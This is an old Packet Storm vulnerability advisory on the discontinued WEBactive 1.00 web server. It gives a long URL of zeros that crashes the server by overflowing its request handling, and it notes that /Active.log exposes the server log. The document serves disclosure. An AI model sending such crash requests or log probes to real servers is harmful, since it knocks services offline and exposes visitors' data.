webactive.txt

2000-07-13T00:00:00
ID PACKETSTORM:22533
Type packetstorm
Reporter Prizm
Modified 2000-07-13T00:00:00

Description

                                        
                                            `  
Application: ITAfrica's WEBactive version 1.00  
Problem Type: Denial of Service  
Author: Prizm(Prizm@RESENTMENT.org)  
Platform(s): Windows 95/NT  
Vendor Status: Not Informed, Project discontinued(I think)  
Download URL: ftp://ftp.mira.net/mirrors/winsock-l/Windows95/Daemons/HTTPD/activ100.zip  
  
Product Description  
-------------------  
WEBactive HTTP Server 1.00 is an HTTP/1.00-compliant World Wide Web server daemon for  
Windows 95 or Windows NT, specifically designed for the SOHO (Small Office/Home)  
environment. It will operate on any TCP/IP connection to the Internet, whether via temporary  
dial-up or permanent leased-line connectivity.   
  
Problem  
-------  
  
The problem is with bounds checking, when you request 280 characters Webactiv.exe just shuts down.  
  
Quick Example:  
  
http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000  
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000  
0000000  
  
*Also* by simply requesting /Active.log, you can view the webserver log, because Active.log is   
the default logfile name and the default directory is where that file is stored.  
  
Vendor Status  
-------------  
  
Heh, this server was discontinued as far as I see... it is rather dated and doesn't support much.  
Seeing as it was last revised in 1996, i think contacting the vendor would be rather meaningless... Also the fact that it is HTTP/1.00-compliant kind of hints it is no longer being updated.  
  
Greetings  
---------  
  
Lamagra, Scrippie, eth0, Cruciphux/HWA and many others...  
  
  
`